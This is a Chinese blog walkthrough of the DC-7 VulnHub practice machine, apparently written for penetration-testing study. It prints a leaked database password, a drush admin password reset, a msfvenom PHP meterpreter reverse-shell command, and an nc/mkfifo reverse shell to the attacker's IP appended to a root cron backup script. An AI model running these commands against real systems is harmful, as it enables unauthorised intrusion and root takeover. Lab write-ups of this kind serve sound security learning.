DC7_靶场实战

最新推荐文章于 2024-02-24 16:16:18 发布
最新推荐文章于 2024-02-24 16:16:18 发布
阅读量1.3k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JSH_CDX/article/details/105204725
版权

DC7_靶场实战

一.环境介绍

虚拟机平台:VMware Workstation Pro

攻击机:Kali2017(IP:10.10.10.133)

靶机:DC-7(IP:10.10.10.134)

二.信息收集

2.1 发现主机
arp-scan -l

在这里插入图片描述

2.2 使用nmap扫描主机

查看端口和服务

nmap -sS -A -p- -T4 10.10.10.134

在这里插入图片描述

三.漏洞挖掘与利用

查看robots.txt,没有发现可利用的东西
在firefox打开10.10.10.134,发现网站是由Drupal框架搭建的,访问80端口,发现是Drupal框架。第一时间想到MSF,搜索drupal,利用几个最新的模块后都没能成功拿到shell。
在这里插入图片描述回到网页发现Drupal是被DIY过的,重点看首页的footer部分,也就是网页的最下方的黑色区域,靶机的除了"Powered by Drupal",还多了一个"@DC7USER"。谷歌搜索"@DC7USER",看有什么发现。
在这里插入图片描述这里本来想选Twitter的,但是打不开,选择第一个进入GitHub寻找源码
在这里插入图片描述看到staffdb,点进去发现有可利用源码
在这里插入图片描述选择config.php,查看发现数据库的账号密码
在这里插入图片描述

用户名:dc7user
密码:MdR3xOgB7#dW

试试能不能登录网站后台,结果不行。尝试用该账号密码登录网站后台无果,尝试登录ssh成功

ssh dc7user@10.10.10.134

在这里插入图片描述

四.提权

查看当前目录下的文件,backups里面有两个加密文件,不可利用,查看mbox文件,发现是一个计划任务:自动备份数据库的执行情况,调用的脚本是/opt/scripts/backups.sh,是root权限执行的。

cat backups/

在这里插入图片描述如果当前用户有脚本的写入权限,那么应该就可以提权了。查看权限发现www-data和root用户才能修改,所以我们需要拿到网站的shell。

ls -l

在这里插入图片描述进入/opt/scripts目录下查看backups.sh的内容

dc7user@dc-7:/opt/scripts$ cat backups.sh

在这里插入图片描述发现drush、gpg两个陌生的命令,其中drush是专门用来管理Drupal站点的shell,可以用来修改密码在这里插入图片描述网站默认都会有一个admin账号,因此可以修改admin账号的密码,这里要进入/var/www/html目录下才有权限执行该命令,这里修改密码为123465,提示success即修改密码成功。

drush user-password admin --password="123456"

在这里插入图片描述用该账号admin,密码123456登录网站后台,在Content中新建一个Basic page,然后在Title输入页面的名称,在Body中放入反弹shell的PHP代码,Text format的位置选择PHP code。但是从下图中可以看到Text format里面没有PHP code选项。这些都弄好了之后,在kali上监听端口,最后点击Preview按钮。

在这里插入图片描述这里发现没有PHP code,原来出于安全考虑,PHP Filter已经从Drupal核心中移除,后续作为一个module存在,可以通过手动安装。选择URL并点击install

URL:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

在这里插入图片描述点击install后再点击添加新的模块
在这里插入图片描述根据提示启用PHP Filter模块在这里插入图片描述添加成功后的界面
在这里插入图片描述
随后在Content中添加webshell.php,点击Content > Add content > Basic page,先将Text format修改为PHP code,再写入反弹shell

在这里插入图片描述可以直接msfvenom生成一个反弹shell代码

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.133 LPORT=4444 R > DC7_shell.php

在这里插入图片描述
复制反弹shell代码到Body里,Title自定义,完了之后放着别动,先使用metasploit监听端口,然后点击Preview

msfconsole
use exploit/multi/handler
set lhost 10.10.10.133
set lport 4444
run

在这里插入图片描述在这里插入图片描述
在这里插入图片描述点击Preview后反弹成功,接着进入交互shell

shell
python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述我们使用Drupal反弹回来的shell用户是www-data,所以接下来就是将反弹shell的代码附加到backups.sh脚本中(因为计划任务是root权限执行的,反弹回来的shell也会是root用户)

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.133 1234 >/tmp/f" >> backups.sh

在这里插入图片描述
然后在kali中监听相应端口,等待计划任务的执行,执行后便获得rootshell,接着进入交互shell

nc -lvnp 1234
shell
python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述拿下flag
在这里插入图片描述因为记错了kali的ip地址在反弹shell的时候卡了好久,希望大家在做靶机能顺利通关,有所收获,谢谢您的观看,希望这对您会有帮助。

JSH_CDX
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1218
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
DC-7靶机渗透测试
读书 买花 长大
04-30 368
DC-7
dc-7 靶机渗透学习
..
03-23 3915
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1080
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 831
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
DC user guide
01-08
Design Compile的官方用户手册,是使用DC进行电路综合必不可少的参考手册
DC系列(7)DC-7渗透测试
Nikris的博客
01-12 3029
DC-7
Vulnhub靶场----7、DC-7
七天
02-24 2610
Vulnhub-DC 7
DC-7靶机渗透
m0_62008601的博客
06-02 1036
dc-7靶机的渗透过程
Vulhub 靶场 DC-7解析
黑战士的博客
02-24 980
kali的靶攻击机IP地址:192.168.200.14DC-7靶机的IP地址:暂时未知注意:靶机和攻击机应处于一个网卡下通过MAC地址判断靶机DC-7的IP 地址。
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
_Co1a
05-09 892
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
DC-7渗透笔记
现代鲁滨逊的博客
05-12 238
做得多了就感觉只是无聊的步骤的重复,毫无技术上的提升,我感觉我不想再做下去了。 1.发现主机192.168.174.158 2.照例nmap扫描,22和80端口都开着呢。 3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。 然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。 4.想扫目录来着,扫了好久都没扫完,就算了。 5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹ 6.没有思路,瞎捣鼓一通之后
vulnhub DC7 靶场练习
鸥鹭忘机
08-20 1740
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第7台,下载地址为https://www.vulnhub.com/entry/dc-7,356/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机中用暴力破解成功的概率非常小,我们需要开阔思路,寻找非技术上的方法。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3210
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机:DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
dcat_admin 数据库迁移
05-26
python manage.py makemigrations dcat_admin ``` 2. 然后执行以下命令,将迁移文件应用到数据库中: ``` python manage.py migrate ``` 以上命令会自动检测并将尚未应用的数据库迁移应用到数据库中。如果你的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值